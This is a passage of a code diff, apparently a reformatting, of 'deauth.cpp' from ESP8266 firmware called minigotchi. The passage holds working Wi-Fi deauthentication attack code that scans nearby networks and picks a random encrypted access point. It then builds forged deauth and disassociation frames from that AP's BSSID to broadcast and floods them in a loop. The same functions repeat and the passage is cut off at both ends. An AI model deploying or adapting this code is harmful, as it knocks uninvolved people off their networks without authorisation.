-    snprintf(buf, sizeof(buf), "%02x:%02x:%02x:%02x:%02x:%02x", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
-    return String(buf);
+  char buf[18]; // 17 for MAC, 1 for null terminator
+  snprintf(buf, sizeof(buf), "%02x:%02x:%02x:%02x:%02x:%02x", mac[0], mac[1],
+           mac[2], mac[3], mac[4], mac[5]);
+  return String(buf);
 }
 
 bool Deauth::select() {
-    // reset values
-    Deauth::randomAP = "";
-    Deauth::randomIndex = -1;
+  // reset values
+  Deauth::randomAP = "";
+  Deauth::randomIndex = -1;
 
-    Parasite::sendDeauthStatus(START_SCAN);
+  Parasite::sendDeauthStatus(START_SCAN);
 
-    // cool animation, skip if parasite mode
-    if (!Config::parasite) {
-        for (int i = 0; i < 5; ++i) {
-            Serial.println("(0-o) Scanning for APs.");
-            Display::updateDisplay("(0-o)", "Scanning  for APs.");
-            delay(Config::shortDelay);
-            Serial.println("(o-0) Scanning for APs..");
-            Display::updateDisplay("(o-0)", "Scanning  for APs..");
-            delay(Config::shortDelay);
-            Serial.println("(0-o) Scanning for APs...");
-            Display::updateDisplay("(0-o)", "Scanning  for APs...");
-            delay(Config::shortDelay);
-            Serial.println(" ");
-            delay(Config::shortDelay);
-        }
-        delay(Config::longDelay);
+  // cool animation, skip if parasite mode
+  if (!Config::parasite) {
+    for (int i = 0; i < 5; ++i) {
+      Serial.println("(0-o) Scanning for APs.");
+      Display::updateDisplay("(0-o)", "Scanning  for APs.");
+      delay(Config::shortDelay);
+      Serial.println("(o-0) Scanning for APs..");
+      Display::updateDisplay("(o-0)", "Scanning  for APs..");
+      delay(Config::shortDelay);
+      Serial.println("(0-o) Scanning for APs...");
+      Display::updateDisplay("(0-o)", "Scanning  for APs...");
+      delay(Config::shortDelay);
+      Serial.println(" ");
+      delay(Config::shortDelay);
+    }
+    delay(Config::longDelay);
+  }
+
+  // stop and scan
+  Minigotchi::monStop();
+
+  int apCount = 0;
+  // If a parasite channel is set, then we want to focus on that channel
+  // Otherwise go off on our own and scan for whatever is out there
+  if (Parasite::channel > 0) {
+    apCount = WiFi.scanNetworks(false, false, Parasite::channel);
+  } else {
+    apCount = WiFi.scanNetworks();
+  }
+
+  if (apCount > 0 && Deauth::randomIndex == -1) {
+    Deauth::randomIndex = random(apCount);
+    Deauth::randomAP = WiFi.SSID(Deauth::randomIndex);
+    uint8_t encType = WiFi.encryptionType(Deauth::randomIndex);
+
+    Serial.print("('-') Selected random AP: ");
+    Serial.println(randomAP.c_str());
+    Serial.println(" ");
+    Display::updateDisplay("('-')", "Selected random AP: " + randomAP);
+    delay(Config::shortDelay);
+
+    if (encType == -1 || encType == ENC_TYPE_NONE) {
+      Serial.println(
+          "('-') Selected AP is not encrypted. Skipping deauthentication...");
+      Display::updateDisplay(
+          "('-')",
+          "Selected AP is not encrypted. Skipping deauthentication...");
+      Parasite::sendDeauthStatus(SKIPPING_UNENCRYPTED);
+      return false;
     }
 
-    // stop and scan
-    Minigotchi::monStop();
-
-    int apCount = 0;
-    // If a parasite channel is set, then we want to focus on that channel
-    // Otherwise go off on our own and scan for whatever is out there
-    if (Parasite::channel > 0) {
-        apCount = WiFi.scanNetworks(false, false, Parasite::channel);
-    } else {
-        apCount = WiFi.scanNetworks();
+    // check for ap in whitelist
+    if (std::find(whitelist.begin(), whitelist.end(), randomAP) !=
+        whitelist.end()) {
+      Serial.println("('-') Selected AP is in the whitelist. Skipping "
+                     "deauthentication...");
+      Display::updateDisplay(
+          "('-')",
+          "Selected AP is in the whitelist. Skipping deauthentication...");
+      Parasite::sendDeauthStatus(SKIPPING_WHITELIST);
+      return false;
     }
 
-    if (apCount > 0 && Deauth::randomIndex == -1) {
-        Deauth::randomIndex = random(apCount);
-        Deauth::randomAP = WiFi.SSID(Deauth::randomIndex);
-        uint8_t encType = WiFi.encryptionType(Deauth::randomIndex);
+    /** developer note:
+     *
+     * here we will create the deauth frame using the header,
+     * as we find the AP in question we also generate the required information
+     * for it as well...
+     *
+     */
 
-        Serial.print("('-') Selected random AP: ");
-        Serial.println(randomAP.c_str());
-        Serial.println(" ");
-        Display::updateDisplay("('-')", "Selected random AP: " + randomAP);
-        delay(Config::shortDelay);
+    // clear out exisitng frame...
+    std::fill(std::begin(Deauth::deauthFrame), std::end(Deauth::deauthFrame),
+              0);
+    std::fill(std::begin(Deauth::disassociateFrame),
+              std::end(Deauth::disassociateFrame), 0);
 
-        if (encType == -1 || encType == ENC_TYPE_NONE) {
-            Serial.println(
-                "('-') Selected AP is not encrypted. Skipping deauthentication...");
-            Display::updateDisplay(
-                "('-')",
-                "Selected AP is not encrypted. Skipping deauthentication...");
-            Parasite::sendDeauthStatus(SKIPPING_UNENCRYPTED);
-            return false;
-        }
+    // copy template
+    std::copy(Deauth::deauthTemp,
+              Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
+              Deauth::deauthFrame);
+    std::copy(Deauth::deauthTemp,
+              Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
+              Deauth::disassociateFrame);
 
-        // check for ap in whitelist
-        if (std::find(whitelist.begin(), whitelist.end(), randomAP) !=
-                whitelist.end()) {
-            Serial.println("('-') Selected AP is in the whitelist. Skipping "
-                           "deauthentication...");
-            Display::updateDisplay(
-                "('-')",
-                "Selected AP is in the whitelist. Skipping deauthentication...");
-            Parasite::sendDeauthStatus(SKIPPING_WHITELIST);
-            return false;
-        }
+    Deauth::deauthFrame[0] = 0xC0; // type
+    Deauth::deauthFrame[1] = 0x00; // subtype
+    Deauth::deauthFrame[2] = 0x00; // duration (SDK takes care of that)
+    Deauth::deauthFrame[3] = 0x00; // duration (SDK takes care of that)
 
-        /** developer note:
-         *
-         * here we will create the deauth frame using the header,
-         * as we find the AP in question we also generate the required information
-         * for it as well...
-         *
-         */
+    Deauth::disassociateFrame[0] = 0xA0; // type
+    Deauth::disassociateFrame[1] = 0x00; // subtype
+    Deauth::disassociateFrame[2] = 0x00; // duration (SDK takes care of that)
+    Deauth::disassociateFrame[3] = 0x00; // duration (SDK takes care of that)
 
-        // clear out exisitng frame...
-        std::fill(std::begin(Deauth::deauthFrame), std::end(Deauth::deauthFrame),
-                  0);
-        std::fill(std::begin(Deauth::disassociateFrame),
-                  std::end(Deauth::disassociateFrame), 0);
+    // bssid
+    uint8_t *apBssid = WiFi.BSSID(Deauth::randomIndex);
 
-        // copy template
-        std::copy(Deauth::deauthTemp,
-                  Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
-                  Deauth::deauthFrame);
-        std::copy(Deauth::deauthTemp,
-                  Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
-                  Deauth::disassociateFrame);
+    /** developer note:
+     *
+     * addr1: reciever addr
+     * addr2: sender addr
+     * addr3: filtering addr
+     *
+     */
 
-        Deauth::deauthFrame[0] = 0xC0; // type
-        Deauth::deauthFrame[1] = 0x00; // subtype
-        Deauth::deauthFrame[2] = 0x00; // duration (SDK takes care of that)
-        Deauth::deauthFrame[3] = 0x00; // duration (SDK takes care of that)
+    // copy our mac(s) to header
+    std::copy(Deauth::broadcastAddr,
+              Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
+              Deauth::deauthFrame + 4);
+    std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 10);
+    std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 16);
 
-        Deauth::disassociateFrame[0] = 0xA0; // type
-        Deauth::disassociateFrame[1] = 0x00; // subtype
-        Deauth::disassociateFrame[2] = 0x00; // duration (SDK takes care of that)
-        Deauth::disassociateFrame[3] = 0x00; // duration (SDK takes care of that)
+    std::copy(Deauth::broadcastAddr,
+              Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
+              Deauth::disassociateFrame + 4);
+    std::copy(apBssid, apBssid + 6, Deauth::disassociateFrame + 10);
+    std::copy(apBssid, apBssid + 6, Deauth::disassociateFrame + 16);
 
-        // bssid
-        uint8_t *apBssid = WiFi.BSSID(Deauth::randomIndex);
+    Serial.print("('-') Full AP SSID: ");
+    Serial.println(WiFi.SSID(Deauth::randomIndex));
+    Display::updateDisplay("('-')",
+                           "Full AP SSID: " + WiFi.SSID(Deauth::randomIndex));
 
-        /** developer note:
-         *
-         * addr1: reciever addr
-         * addr2: sender addr
-         * addr3: filtering addr
-         *
-         */
+    Serial.print("('-') AP Encryption: ");
+    Serial.println(WiFi.encryptionType(Deauth::randomIndex));
+    Display::updateDisplay(
+        "('-')",
+        "AP Encryption: " + (String)WiFi.encryptionType(Deauth::randomIndex));
 
-        // copy our mac(s) to header
-        std::copy(Deauth::broadcastAddr,
-                  Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
-                  Deauth::deauthFrame + 4);
-        std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 10);
-        std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 16);
+    Serial.print("('-') AP RSSI: ");
+    Serial.println(WiFi.RSSI(Deauth::randomIndex));
+    Display::updateDisplay("('-')", "AP RSSI: " +
+                                        (String)WiFi.RSSI(Deauth::randomIndex));
 
-        std::copy(Deauth::broadcastAddr,
-                  Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
-                  Deauth::disassociateFrame + 4);
-        std::copy(apBssid, apBssid + 6,
-                  Deauth::disassociateFrame + 10);
-        std::copy(apBssid, apBssid + 6,
-                  Deauth::disassociateFrame + 16);
+    Serial.print("('-') AP BSSID: ");
+    printMac(apBssid);
+    Display::updateDisplay("('-')",
+                           "AP BSSID: " + Deauth::printMacStr(apBssid));
 
-        Serial.print("('-') Full AP SSID: ");
-        Serial.println(WiFi.SSID(Deauth::randomIndex));
-        Display::updateDisplay("('-')",
-                               "Full AP SSID: " + WiFi.SSID(Deauth::randomIndex));
+    Serial.print("('-') AP Channel: ");
+    Serial.println(WiFi.channel(Deauth::randomIndex));
+    Display::updateDisplay(
+        "('-')", "AP Channel: " + (String)WiFi.channel(Deauth::randomIndex));
 
-        Serial.print("('-') AP Encryption: ");
-        Serial.println(WiFi.encryptionType(Deauth::randomIndex));
-        Display::updateDisplay(
-            "('-')",
-            "AP Encryption: " + (String)WiFi.encryptionType(Deauth::randomIndex));
+    Serial.print("('-') AP Hidden?: ");
+    Serial.println(Deauth::printHidden(Deauth::randomIndex));
+    Display::updateDisplay(
+        "('-')", "AP Hidden?: " + Deauth::printHidden(Deauth::randomIndex));
+    Serial.println(" ");
+    delay(Config::longDelay);
 
-        Serial.print("('-') AP RSSI: ");
-        Serial.println(WiFi.RSSI(Deauth::randomIndex));
-        Display::updateDisplay("('-')", "AP RSSI: " +
-                               (String)WiFi.RSSI(Deauth::randomIndex));
+    Parasite::sendDeauthStatus(PICKED_AP, Deauth::randomAP.c_str(),
+                               WiFi.channel(Deauth::randomIndex));
 
-        Serial.print("('-') AP BSSID: ");
-        printMac(apBssid);
-        Display::updateDisplay("('-')",
-                               "AP BSSID: " + Deauth::printMacStr(apBssid));
+    return true;
+  } else if (apCount < 0) {
+    Serial.println("(;-;) I don't know what you did, but you screwed up!");
+    Serial.println(" ");
+    Display::updateDisplay("(;-;)", "You screwed up somehow!");
 
-        Serial.print("('-') AP Channel: ");
-        Serial.println(WiFi.channel(Deauth::randomIndex));
-        Display::updateDisplay(
-            "('-')", "AP Channel: " + (String)WiFi.channel(Deauth::randomIndex));
+    Parasite::sendDeauthStatus(DEAUTH_SCAN_ERROR);
 
-        Serial.print("('-') AP Hidden?: ");
-        Serial.println(Deauth::printHidden(Deauth::randomIndex));
-        Display::updateDisplay(
-            "('-')", "AP Hidden?: " + Deauth::printHidden(Deauth::randomIndex));
-        Serial.println(" ");
-        delay(Config::longDelay);
+    delay(Config::shortDelay);
+  } else {
+    // well ur fucked.
+    Serial.println("(;-;) No access points found.");
+    Serial.println(" ");
+    Display::updateDisplay("(;-;)", "No access points found.");
 
-        Parasite::sendDeauthStatus(PICKED_AP, Deauth::randomAP.c_str(),
-                                   WiFi.channel(Deauth::randomIndex));
+    Parasite::sendDeauthStatus(NO_APS);
 
-        return true;
-    } else if (apCount < 0) {
-        Serial.println("(;-;) I don't know what you did, but you screwed up!");
-        Serial.println(" ");
-        Display::updateDisplay("(;-;)", "You screwed up somehow!");
-
-        Parasite::sendDeauthStatus(DEAUTH_SCAN_ERROR);
-
-        delay(Config::shortDelay);
-    } else {
-        // well ur fucked.
-        Serial.println("(;-;) No access points found.");
-        Serial.println(" ");
-        Display::updateDisplay("(;-;)", "No access points found.");
-
-        Parasite::sendDeauthStatus(NO_APS);
-
-        delay(Config::shortDelay);
-    }
-    return false;
+    delay(Config::shortDelay);
+  }
+  return false;
 }
 
 void Deauth::deauth() {
-    if (Config::deauth) {
-        // select AP
-        if (Deauth::select()) {
-            if (randomAP.length() > 0) {
-                Serial.println(
-                    "(>-<) Starting deauthentication attack on the selected AP...");
-                Serial.println(" ");
-                Display::updateDisplay("(>-<)", "Begin deauth-attack on AP...");
-                delay(Config::shortDelay);
-                // define the attack
-                if (!running) {
-                    start();
-                } else {
-                    Serial.println("('-') Attack is already running.");
-                    Serial.println(" ");
-                    Display::updateDisplay("('-')", "Attack is already running.");
-                    delay(Config::shortDelay);
-                }
-            } else {
-                // ok why did you modify the deauth function? i literally told you to
-                // not do that...
-                Serial.println("(X-X) No access point selected. Use select() first.");
-                Serial.println("('-') Told you so!");
-                Serial.println(" ");
-                Display::updateDisplay("(X-X)",
-                                       "No access point selected. Use select() first.");
-                delay(Config::shortDelay);
-                Display::updateDisplay("('-')", "Told you so!");
-                delay(Config::shortDelay);
-                return;
-            }
+  if (Config::deauth) {
+    // select AP
+    if (Deauth::select()) {
+      if (randomAP.length() > 0) {
+        Serial.println(
+            "(>-<) Starting deauthentication attack on the selected AP...");
+        Serial.println(" ");
+        Display::updateDisplay("(>-<)", "Begin deauth-attack on AP...");
+        delay(Config::shortDelay);
+        // define the attack
+        if (!running) {
+          start();
+        } else {
+          Serial.println("('-') Attack is already running.");
+          Serial.println(" ");
+          Display::updateDisplay("('-')", "Attack is already running.");
+          delay(Config::shortDelay);
         }
-    } else {
-        // do nothing if deauthing is disabled
+      } else {
+        // ok why did you modify the deauth function? i literally told you to
+        // not do that...
+        Serial.println("(X-X) No access point selected. Use select() first.");
+        Serial.println("('-') Told you so!");
+        Serial.println(" ");
+        Display::updateDisplay("(X-X)",
+                               "No access point selected. Use select() first.");
+        delay(Config::shortDelay);
+        Display::updateDisplay("('-')", "Told you so!");
+        delay(Config::shortDelay);
+        return;
+      }
     }
+  } else {
+    // do nothing if deauthing is disabled
+  }
 }
 
 void Deauth::start() {
-    running = true;
-    int deauthFrameSize = sizeof(deauthFrame);
-    int disassociateFrameSize = sizeof(disassociateFrame);
-    int packets = 0;
-    unsigned long startTime = millis();
+  running = true;
+  int deauthFrameSize = sizeof(deauthFrame);
+  int disassociateFrameSize = sizeof(disassociateFrame);
+  int packets = 0;
+  unsigned long startTime = millis();
 
-    // packet calculation
-    int basePacketCount = 150;
-    int rssi = WiFi.RSSI(Deauth::randomIndex);
-    int numDevices = WiFi.softAPgetStationNum();
+  // packet calculation
+  int basePacketCount = 150;
+  int rssi = WiFi.RSSI(Deauth::randomIndex);
+  int numDevices = WiFi.softAPgetStationNum();
 
-    int packetCount = basePacketCount + (numDevices * 10);
-    if (rssi > -50) {
-        packetCount /= 2; // strong signal
-    } else if (rssi < -80) {
-        packetCount *= 2; // weak signal
+  int packetCount = basePacketCount + (numDevices * 10);
+  if (rssi > -50) {
+    packetCount /= 2; // strong signal
+  } else if (rssi < -80) {
+    packetCount *= 2; // weak signal
+  }
+
+  Parasite::sendDeauthStatus(START_DEAUTH, Deauth::randomAP.c_str(),
+                             WiFi.channel(Deauth::randomIndex));
+
+  // send the deauth 150 times(ur cooked if they find out)
+  for (int i = 0; i < packetCount; ++i) {
+    if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+        Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+      packets++;
+      float pps = packets / (float)(millis() - startTime) * 1000;
+
+      // show pps
+      if (!isinf(pps)) {
+        Serial.print("(>-<) Packets per second: ");
+        Serial.print(pps);
+        Serial.print(" pkt/s");
+        Serial.println(" (AP:" + randomAP + ")");
+        Display::updateDisplay("(>-<)", "Packets per second: " + (String)pps +
+                                            " pkt/s" + "(AP:" + randomAP + ")");
+      }
+    } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+               !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+      Serial.println("(X-X) Both packets failed to send!");
+      Display::updateDisplay("(X-X)", "Both packets failed to send!");
+    } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+               Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+      Serial.println("(X-X) Deauthentication failed to send!");
+      Display::updateDisplay("(X-X)", "Deauth failed to send!");
+    } else if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+               !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+      Serial.println("(X-X) Disassociation failed to send!");
+      Display::updateDisplay("(X-X)", "Disassoc failed to send!");
+    } else {
+      Serial.println("(X-X) Unable to calculate pkt/s!");
+      Display::updateDisplay("(X-X)", "Unable to calculate pkt/s!");
     }
+  }
 
-    Parasite::sendDeauthStatus(START_DEAUTH, Deauth::randomAP.c_str(),
-                               WiFi.channel(Deauth::randomIndex));
-
-    // send the deauth 150 times(ur cooked if they find out)
-    for (int i = 0; i < packetCount; ++i) {
-        if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-                Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-            packets++;
-            float pps = packets / (float)(millis() - startTime) * 1000;
-
-            // show pps
-            if (!isinf(pps)) {
-                Serial.print("(>-<) Packets per second: ");
-                Serial.print(pps);
-                Serial.print(" pkt/s");
-                Serial.println(" (AP:" + randomAP + ")");
-                Display::updateDisplay("(>-<)", "Packets per second: " + (String)pps +
-                                       " pkt/s" + "(AP:" + randomAP + ")");
-            }
-        } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-                   !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-            Serial.println("(X-X) Both packets failed to send!");
-            Display::updateDisplay("(X-X)", "Both packets failed to send!");
-        } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-                   Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-            Serial.println("(X-X) Deauthentication failed to send!");
-            Display::updateDisplay("(X-X)", "Deauth failed to send!");
-        } else if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-                   !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-            Serial.println("(X-X) Disassociation failed to send!");
-            Display::updateDisplay("(X-X)", "Disassoc failed to send!");
-        } else {
-            Serial.println("(X-X) Unable to calculate pkt/s!");
-            Display::updateDisplay("(X-X)", "Unable to calculate pkt/s!");
-        }
-    }
-
-    Serial.println(" ");
-    Serial.println("(^-^) Attack finished!");
-    Serial.println(" ");
-    Display::updateDisplay("(^-^)", "Attack finished!");
-    running = false;
+  Serial.println(" ");
+  Serial.println("(^-^) Attack finished!");
+  Serial.println(" ");
+  Display::updateDisplay("(^-^)", "Attack finished!");
+  running = false;
 }

--- a/minigotchi/deauth.cpp
+++ b/minigotchi/deauth.cpp
@@ -59,355 +59,355 @@ uint8_t Deauth::disassociateFrame[26];
 uint8_t Deauth::broadcastAddr[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
 
 void Deauth::add(const std::string &bssids) {
-    std::stringstream ss(bssids);
-    std::string token;
+  std::stringstream ss(bssids);
+  std::string token;
 
-    // seperate info and whitelist
-    while (std::getline(ss, token, ',')) {
-        // trim out whitespace
-        token.erase(0, token.find_first_not_of(" \t\r\n"));
-        token.erase(token.find_last_not_of(" \t\r\n") + 1);
+  // seperate info and whitelist
+  while (std::getline(ss, token, ',')) {
+    // trim out whitespace
+    token.erase(0, token.find_first_not_of(" \t\r\n"));
+    token.erase(token.find_last_not_of(" \t\r\n") + 1);
 
-        // add to whitelist
-        Serial.print("('-') Adding ");
-        Serial.print(token.c_str());
-        Serial.println(" to the whitelist");
-        Display::updateDisplay("('-')", "Adding " + (String) + " to the whitelist");
-        whitelist.push_back(token.c_str());
-    }
+    // add to whitelist
+    Serial.print("('-') Adding ");
+    Serial.print(token.c_str());
+    Serial.println(" to the whitelist");
+    Display::updateDisplay("('-')", "Adding " + (String) + " to the whitelist");
+    whitelist.push_back(token.c_str());
+  }
 }
 
 void Deauth::list() {
-    for (const auto &bssid : Config::whitelist) {
-        Deauth::add(bssid);
-    }
+  for (const auto &bssid : Config::whitelist) {
+    Deauth::add(bssid);
+  }
 }
 
 bool Deauth::send(uint8_t *buf, uint16_t len, bool sys_seq) {
-    // apparently will not work with 0 on regular, fixed on spacehuhn
-    bool sent = wifi_send_pkt_freedom(buf, len, sys_seq) == 0;
-    delay(102);
+  // apparently will not work with 0 on regular, fixed on spacehuhn
+  bool sent = wifi_send_pkt_freedom(buf, len, sys_seq) == 0;
+  delay(102);
 
-    return sent;
+  return sent;
 }
 
 // check if this is a broadcast
 // source:
 // https://github.com/SpacehuhnTech/esp8266_deauther/blob/v2/esp8266_deauther/functions.h#L334
 bool Deauth::broadcast(uint8_t *mac) {
-    for (uint8_t i = 0; i < 6; i++) {
-        if (mac[i] != broadcastAddr[i])
-            return false;
-    }
+  for (uint8_t i = 0; i < 6; i++) {
+    if (mac[i] != broadcastAddr[i])
+      return false;
+  }
 
-    return true;
+  return true;
 }
 
 void Deauth::printMac(uint8_t *mac) {
-    String macStr = printMacStr(mac);
-    Serial.println(macStr);
-    Display::updateDisplay("('-')", "AP BSSID: " + macStr);
+  String macStr = printMacStr(mac);
+  Serial.println(macStr);
+  Display::updateDisplay("('-')", "AP BSSID: " + macStr);
 }
 
 String Deauth::printHidden(int network) {
-    String hidden;
-    bool check = WiFi.isHidden(network);
+  String hidden;
+  bool check = WiFi.isHidden(network);
 
-    if (check == 0) {
-        hidden = "False";
-    } else {
-        hidden = "True";
-    }
+  if (check == 0) {
+    hidden = "False";
+  } else {
+    hidden = "True";
+  }
 
-    return hidden;
+  return hidden;
 }
 
 String Deauth::printMacStr(uint8_t *mac) {
-    char buf[18]; // 17 for MAC, 1 for null terminator
-    snprintf(buf, sizeof(buf), "%02x:%02x:%02x:%02x:%02x:%02x", mac[0], mac[1],
-             mac[2], mac[3], mac[4], mac[5]);
-    return String(buf);
+  char buf[18]; // 17 for MAC, 1 for null terminator
+  snprintf(buf, sizeof(buf), "%02x:%02x:%02x:%02x:%02x:%02x", mac[0], mac[1],
+           mac[2], mac[3], mac[4], mac[5]);
+  return String(buf);
 }
 
 bool Deauth::select() {
-    // reset values
-    Deauth::randomAP = "";
-    Deauth::randomIndex = -1;
+  // reset values
+  Deauth::randomAP = "";
+  Deauth::randomIndex = -1;
 
-    Parasite::sendDeauthStatus(START_SCAN);
+  Parasite::sendDeauthStatus(START_SCAN);
 
-    // cool animation, skip if parasite mode
-    if (!Config::parasite) {
-        for (int i = 0; i < 5; ++i) {
-            Serial.println("(0-o) Scanning for APs.");
-            Display::updateDisplay("(0-o)", "Scanning  for APs.");
-            delay(Config::shortDelay);
-            Serial.println("(o-0) Scanning for APs..");
-            Display::updateDisplay("(o-0)", "Scanning  for APs..");
-            delay(Config::shortDelay);
-            Serial.println("(0-o) Scanning for APs...");
-            Display::updateDisplay("(0-o)", "Scanning  for APs...");
-            delay(Config::shortDelay);
-            Serial.println(" ");
-            delay(Config::shortDelay);
-        }
-        delay(Config::longDelay);
+  // cool animation, skip if parasite mode
+  if (!Config::parasite) {
+    for (int i = 0; i < 5; ++i) {
+      Serial.println("(0-o) Scanning for APs.");
+      Display::updateDisplay("(0-o)", "Scanning  for APs.");
+      delay(Config::shortDelay);
+      Serial.println("(o-0) Scanning for APs..");
+      Display::updateDisplay("(o-0)", "Scanning  for APs..");
+      delay(Config::shortDelay);
+      Serial.println("(0-o) Scanning for APs...");
+      Display::updateDisplay("(0-o)", "Scanning  for APs...");
+      delay(Config::shortDelay);
+      Serial.println(" ");
+      delay(Config::shortDelay);
+    }
+    delay(Config::longDelay);
+  }
+
+  // stop and scan
+  Minigotchi::monStop();
+
+  int apCount = 0;
+  // If a parasite channel is set, then we want to focus on that channel
+  // Otherwise go off on our own and scan for whatever is out there
+  if (Parasite::channel > 0) {
+    apCount = WiFi.scanNetworks(false, false, Parasite::channel);
+  } else {
+    apCount = WiFi.scanNetworks();
+  }
+
+  if (apCount > 0 && Deauth::randomIndex == -1) {
+    Deauth::randomIndex = random(apCount);
+    Deauth::randomAP = WiFi.SSID(Deauth::randomIndex);
+    uint8_t encType = WiFi.encryptionType(Deauth::randomIndex);
+
+    Serial.print("('-') Selected random AP: ");
+    Serial.println(randomAP.c_str());
+    Serial.println(" ");
+    Display::updateDisplay("('-')", "Selected random AP: " + randomAP);
+    delay(Config::shortDelay);
+
+    if (encType == -1 || encType == ENC_TYPE_NONE) {
+      Serial.println(
+          "('-') Selected AP is not encrypted. Skipping deauthentication...");
+      Display::updateDisplay(
+          "('-')",
+          "Selected AP is not encrypted. Skipping deauthentication...");
+      Parasite::sendDeauthStatus(SKIPPING_UNENCRYPTED);
+      return false;
     }
 
-    // stop and scan
-    Minigotchi::monStop();
-
-    int apCount = 0;
-    // If a parasite channel is set, then we want to focus on that channel
-    // Otherwise go off on our own and scan for whatever is out there
-    if (Parasite::channel > 0) {
-        apCount = WiFi.scanNetworks(false, false, Parasite::channel);
-    } else {
-        apCount = WiFi.scanNetworks();
+    // check for ap in whitelist
+    if (std::find(whitelist.begin(), whitelist.end(), randomAP) !=
+        whitelist.end()) {
+      Serial.println("('-') Selected AP is in the whitelist. Skipping "
+                     "deauthentication...");
+      Display::updateDisplay(
+          "('-')",
+          "Selected AP is in the whitelist. Skipping deauthentication...");
+      Parasite::sendDeauthStatus(SKIPPING_WHITELIST);
+      return false;
     }
 
-    if (apCount > 0 && Deauth::randomIndex == -1) {
-        Deauth::randomIndex = random(apCount);
-        Deauth::randomAP = WiFi.SSID(Deauth::randomIndex);
-        uint8_t encType = WiFi.encryptionType(Deauth::randomIndex);
+    /** developer note:
+     *
+     * here we will create the deauth frame using the header,
+     * as we find the AP in question we also generate the required information
+     * for it as well...
+     *
+     */
 
-        Serial.print("('-') Selected random AP: ");
-        Serial.println(randomAP.c_str());
-        Serial.println(" ");
-        Display::updateDisplay("('-')", "Selected random AP: " + randomAP);
-        delay(Config::shortDelay);
+    // clear out exisitng frame...
+    std::fill(std::begin(Deauth::deauthFrame), std::end(Deauth::deauthFrame),
+              0);
+    std::fill(std::begin(Deauth::disassociateFrame),
+              std::end(Deauth::disassociateFrame), 0);
 
-        if (encType == -1 || encType == ENC_TYPE_NONE) {
-            Serial.println(
-                "('-') Selected AP is not encrypted. Skipping deauthentication...");
-            Display::updateDisplay(
-                "('-')",
-                "Selected AP is not encrypted. Skipping deauthentication...");
-            Parasite::sendDeauthStatus(SKIPPING_UNENCRYPTED);
-            return false;
-        }
+    // copy template
+    std::copy(Deauth::deauthTemp,
+              Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
+              Deauth::deauthFrame);
+    std::copy(Deauth::deauthTemp,
+              Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
+              Deauth::disassociateFrame);
 
-        // check for ap in whitelist
-        if (std::find(whitelist.begin(), whitelist.end(), randomAP) !=
-                whitelist.end()) {
-            Serial.println("('-') Selected AP is in the whitelist. Skipping "
-                           "deauthentication...");
-            Display::updateDisplay(
-                "('-')",
-                "Selected AP is in the whitelist. Skipping deauthentication...");
-            Parasite::sendDeauthStatus(SKIPPING_WHITELIST);
-            return false;
-        }
+    Deauth::deauthFrame[0] = 0xC0; // type
+    Deauth::deauthFrame[1] = 0x00; // subtype
+    Deauth::deauthFrame[2] = 0x00; // duration (SDK takes care of that)
+    Deauth::deauthFrame[3] = 0x00; // duration (SDK takes care of that)
 
-        /** developer note:
-         *
-         * here we will create the deauth frame using the header,
-         * as we find the AP in question we also generate the required information
-         * for it as well...
-         *
-         */
+    Deauth::disassociateFrame[0] = 0xA0; // type
+    Deauth::disassociateFrame[1] = 0x00; // subtype
+    Deauth::disassociateFrame[2] = 0x00; // duration (SDK takes care of that)
+    Deauth::disassociateFrame[3] = 0x00; // duration (SDK takes care of that)
 
-        // clear out exisitng frame...
-        std::fill(std::begin(Deauth::deauthFrame), std::end(Deauth::deauthFrame),
-                  0);
-        std::fill(std::begin(Deauth::disassociateFrame),
-                  std::end(Deauth::disassociateFrame), 0);
+    // bssid
+    uint8_t *apBssid = WiFi.BSSID(Deauth::randomIndex);
 
-        // copy template
-        std::copy(Deauth::deauthTemp,
-                  Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
-                  Deauth::deauthFrame);
-        std::copy(Deauth::deauthTemp,
-                  Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
-                  Deauth::disassociateFrame);
+    /** developer note:
+     *
+     * addr1: reciever addr
+     * addr2: sender addr
+     * addr3: filtering addr
+     *
+     */
 
-        Deauth::deauthFrame[0] = 0xC0; // type
-        Deauth::deauthFrame[1] = 0x00; // subtype
-        Deauth::deauthFrame[2] = 0x00; // duration (SDK takes care of that)
-        Deauth::deauthFrame[3] = 0x00; // duration (SDK takes care of that)
+    // copy our mac(s) to header
+    std::copy(Deauth::broadcastAddr,
+              Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
+              Deauth::deauthFrame + 4);
+    std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 10);
+    std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 16);
 
-        Deauth::disassociateFrame[0] = 0xA0; // type
-        Deauth::disassociateFrame[1] = 0x00; // subtype
